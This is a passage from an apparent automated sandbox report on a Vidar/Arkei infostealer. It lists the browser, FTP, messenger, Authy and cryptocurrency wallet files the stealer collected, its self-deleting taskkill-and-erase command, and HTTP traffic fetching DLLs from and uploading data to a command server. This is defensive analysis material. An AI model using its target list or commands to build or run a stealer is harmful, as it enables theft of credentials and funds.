  849. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  850.  
  851.  
  852. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FlorinCoin\\"
  853.  
  854.  
  855.  
  856.  
  857. "Description": "Harvests credentials from local FTP client software",
  858. "Details":
  859.  
  860. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  861.  
  862.  
  863.  
  864.  
  865. "Description": "Harvests information related to installed instant messenger clients",
  866. "Details":
  867.  
  868. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  869.  
  870.  
  871.  
  872.  
  873. "Description": "Collects information to fingerprint the system",
  874. "Details":
  875.  
  876.  
  877. "Description": "Created network traffic indicative of malicious activity",
  878. "Details":
  879.  
  880. "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  881.  
  882.  
  883.  
  884.  
  885. "Description": "Uses suspicious command line tools or Windows utilities",
  886. "Details":
  887.  
  888. "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im gK19ixrobtPtI0.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe & exit"
  889.  
  890.  
  891. "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im gK19ixrobtPtI0.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe & exit"
  892.  
  893.  
  894. "command": "taskkill /im gK19ixrobtPtI0.exe /f"
  895.  
  896.  
  897.  
  898.  
  899.  
  900. * Started Service:
  901. "VaultSvc"
  902.  
  903.  
  904. * Mutexes:
  905. "Global\\CLR_PerfMon_WrapMutex",
  906. "Global\\CLR_CASOFF_MUTEX",
  907. "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963"
  908.  
  909.  
  910. * Modified Files:
  911. "C:\\Users\\user\\AppData\\Local\\GDIPFONTCACHEV1.DAT",
  912. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\passwords.txt",
  913. "C:\\ProgramData\\freebl3.dll",
  914. "C:\\ProgramData\\mozglue.dll",
  915. "C:\\ProgramData\\msvcp140.dll",
  916. "C:\\ProgramData\\nss3.dll",
  917. "C:\\ProgramData\\softokn3.dll",
  918. "C:\\ProgramData\\vcruntime140.dll",
  919. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\ld",
  920. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\historych",
  921. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\History\\Google Chrome_Default.txt",
  922. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Downloads\\Google Chrome_Default.txt",
  923. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\c",
  924. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Google Chrome_Default.txt",
  925. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\wd",
  926. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Autofill\\Google Chrome_Default.txt",
  927. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\CC\\Google Chrome_Default.txt",
  928. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Soft\\Authy\\\\xef\\x97\\xa8\\xcf\\x8a\\xe3\\xa2\\x9e\\xe7\\x9e\\xa9\\xc4\\xb8\\xc7\\xba\\xe3\\xa1\\xba\\xe7\\x9e\\xa9",
  929. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\IE_Cookies.txt",
  930. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Edge_Cookies.txt",
  931. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\cookie_list.txt",
  932. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\information.txt",
  933. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Bitcoin\\\\x12",
  934. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Ethereum\\",
  935. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Electrum\\\n",
  936. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\ElectrumLTC\\",
  937. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Exodus\\\n",
  938. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Exodus\\",
  939. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\ElectronCash\\",
  940. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MultiDoge\\\n",
  941. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Zcash\\",
  942. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DashCore\\",
  943. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Litecoin\\",
  944. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Anoncoin\\",
  945. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\BBQCoin\\",
  946. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DevCoin\\",
  947. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DigitalCoin\\",
  948. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FlorinCoin\\",
  949. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Franko\\",
  950. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FreiCoin\\",
  951. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\GoldCoinGLD\\\n",
  952. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\InfiniteCoin\\",
  953. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IOCoin\\",
  954. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IxCoin\\",
  955. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MegaCoin\\",
  956. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MinCoin\\",
  957. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\NameCoin\\",
  958. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\PrimeCoin\\",
  959. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\TerraCoin\\",
  960. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\YACoin\\",
  961. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\JAXX\\",
  962. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\screenshot.jpg",
  963. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\US_00000000-0000-0000-0000-0000000000001449353492.zip",
  964. "\\??\\WMIDataDevice",
  965. "\\??\\PIPE\\samr",
  966. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
  967. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
  968. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
  969. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
  970. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
  971. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
  972. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
  973. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  974.  
  975.  
  976. * Deleted Files:
  977. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2172.32295765",
  978. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2172.32295765",
  979. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2172.32295781",
  980. "C:\\ProgramData\\freebl3.dll",
  981. "C:\\ProgramData\\mozglue.dll",
  982. "C:\\ProgramData\\msvcp140.dll",
  983. "C:\\ProgramData\\nss3.dll",
  984. "C:\\ProgramData\\softokn3.dll",
  985. "C:\\ProgramData\\vcruntime140.dll",
  986. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Autofill\\Google Chrome_Default.txt",
  987. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Autofill",
  988. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\CC\\Google Chrome_Default.txt",
  989. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\CC",
  990. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Edge_Cookies.txt",
  991. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Google Chrome_Default.txt",
  992. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\IE_Cookies.txt",
  993. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies",
  994. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\cookie_list.txt",
  995. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Downloads\\Google Chrome_Default.txt",
  996. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Downloads",
  997. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\History\\Google Chrome_Default.txt",
  998. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\History",
  999. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\information.txt",
  1000. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\passwords.txt",
  1001. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\screenshot.jpg",
  1002. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Soft\\Authy",
  1003. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Soft",
  1004. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Anoncoin",
  1005. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\BBQCoin",
  1006. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Bitcoin",
  1007. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DashCore",
  1008. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DevCoin",
  1009. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DigitalCoin",
  1010. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\ElectronCash",
  1011. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Electrum",
  1012. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\ElectrumLTC",
  1013. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Ethereum",
  1014. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Exodus",
  1015. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FlorinCoin",
  1016. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Franko",
  1017. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FreiCoin",
  1018. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\GoldCoinGLD",
  1019. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\InfiniteCoin",
  1020. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IOCoin",
  1021. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IxCoin",
  1022. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\JAXX",
  1023. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Litecoin",
  1024. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MegaCoin",
  1025. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MinCoin",
  1026. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MultiDoge",
  1027. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\NameCoin",
  1028. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\PrimeCoin",
  1029. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\TerraCoin",
  1030. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\YACoin",
  1031. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Zcash",
  1032. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets",
  1033. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\US_00000000-0000-0000-0000-0000000000001449353492.zip",
  1034. "C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe"
  1035.  
  1036.  
  1037. * Modified Registry Keys:
  1038. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  1039. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
  1040. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
  1041. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
  1042. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  1043. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
  1044. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
  1045. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
  1046. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
  1047. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
  1048. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
  1049. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider"
  1050.  
  1051.  
  1052. * Deleted Registry Keys:
  1053.  
  1054. * DNS Communications:
  1055.  
  1056. "type": "A",
  1057. "request": "dersed.com",
  1058. "answers":
  1059.  
  1060. "data": "104.200.67.209",
  1061. "type": "A"
  1062.  
  1063.  
  1064.  
  1065.  
  1066. "type": "A",
  1067. "request": "ip-api.com",
  1068. "answers":
  1069.  
  1070. "data": "72.11.140.50",
  1071. "type": "A"
  1072.  
  1073.  
  1074. "data": "66.212.29.250",
  1075. "type": "A"
  1076.  
  1077.  
  1078.  
  1079.  
  1080.  
  1081. * Domains:
  1082.  
  1083. "ip": "104.200.67.209",
  1084. "domain": "dersed.com"
  1085.  
  1086.  
  1087. "ip": "72.11.140.50",
  1088. "domain": "ip-api.com"
  1089.  
  1090.  
  1091.  
  1092. * Network Communication - ICMP:
  1093.  
  1094. * Network Communication - HTTP:
  1095.  
  1096. "count": 1,
  1097. "body": "--1BEF0A57BE110FD467A--\r\n",
  1098. "uri": "http://dersed.com/288",
  1099. "user-agent": "",
  1100. "method": "POST",
  1101. "host": "dersed.com",
  1102. "version": "1.1",
  1103. "path": "/288",
  1104. "data": "POST /288 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  1105. "port": 80
  1106.  
  1107.  
  1108. "count": 1,
  1109. "body": "",
  1110. "uri": "http://dersed.com/freebl3.dll",
  1111. "user-agent": "",
  1112. "method": "GET",
  1113. "host": "dersed.com",
  1114. "version": "1.1",
  1115. "path": "/freebl3.dll",
  1116. "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1117. "port": 80
  1118.  
  1119.  
  1120. "count": 1,
  1121. "body": "",
  1122. "uri": "http://dersed.com/mozglue.dll",
  1123. "user-agent": "",
  1124. "method": "GET",
  1125. "host": "dersed.com",
  1126. "version": "1.1",
  1127. "path": "/mozglue.dll",
  1128. "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1129. "port": 80
  1130.  
  1131.  
  1132. "count": 1,
  1133. "body": "",
  1134. "uri": "http://dersed.com/msvcp140.dll",
  1135. "user-agent": "",
  1136. "method": "GET",
  1137. "host": "dersed.com",
  1138. "version": "1.1",
  1139. "path": "/msvcp140.dll",
  1140. "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1141. "port": 80
  1142.  
  1143.  
  1144. "count": 1,
  1145. "body": "",
  1146. "uri": "http://dersed.com/nss3.dll",
  1147. "user-agent": "",
  1148. "method": "GET",
  1149. "host": "dersed.com",
  1150. "version": "1.1",
  1151. "path": "/nss3.dll",
  1152. "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1153. "port": 80
  1154.  
  1155.  
  1156. "count": 1,
  1157. "body": "",
  1158. "uri": "http://dersed.com/softokn3.dll",
  1159. "user-agent": "",
  1160. "method": "GET",
  1161. "host": "dersed.com",
  1162. "version": "1.1",
  1163. "path": "/softokn3.dll",
  1164. "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1165. "port": 80
  1166.  
  1167.  
  1168. "count": 1,
  1169. "body": "",
  1170. "uri": "http://dersed.com/vcruntime140.dll",
  1171. "user-agent": "",
  1172. "method": "GET",
  1173. "host": "dersed.com",
  1174. "version": "1.1",
  1175. "path": "/vcruntime140.dll",
  1176. "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1177. "port": 80
  1178.  
  1179.  
  1180. "count": 1,
  1181. "body": "--1BEF0A57BE110FD467A--\r\n",
  1182. "uri": "http://ip-api.com/line/",
  1183. "user-agent": "",
  1184. "method": "POST",
  1185. "host": "ip-api.com",
  1186. "version": "1.1",
  1187. "path": "/line/",
  1188. "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  1189. "port": 80
  1190.  
  1191.  
  1192. "count": 1,
  1193. "body": "",
  1194. "uri": "http://dersed.com/",
  1195. "user-agent": "",
  1196. "method": "POST",
  1197. "host": "dersed.com",
  1198. "version": "1.1",
  1199. "path": "/",
  1200. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 38585\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  1201. "port": 80
  1202.  
  1203.  
  1204.  
  1205. * Network Communication - SMTP:
  1206.  
  1207. * Network Communication - Hosts:
  1208.  
  1209. "country_name": "United States",
  1210. "ip": "66.212.29.250",
  1211. "inaddrarpa": "",
  1212. "hostname": "ip-api.com"
  1213.  
  1214.  
  1215. "country_name": "United States",
  1216. "ip": "104.200.67.209",
  1217. "inaddrarpa": "",
  1218. "hostname": "dersed.com"
  1219.  
  1220.  
  1221.  
  1222. * Network Communication - IRC: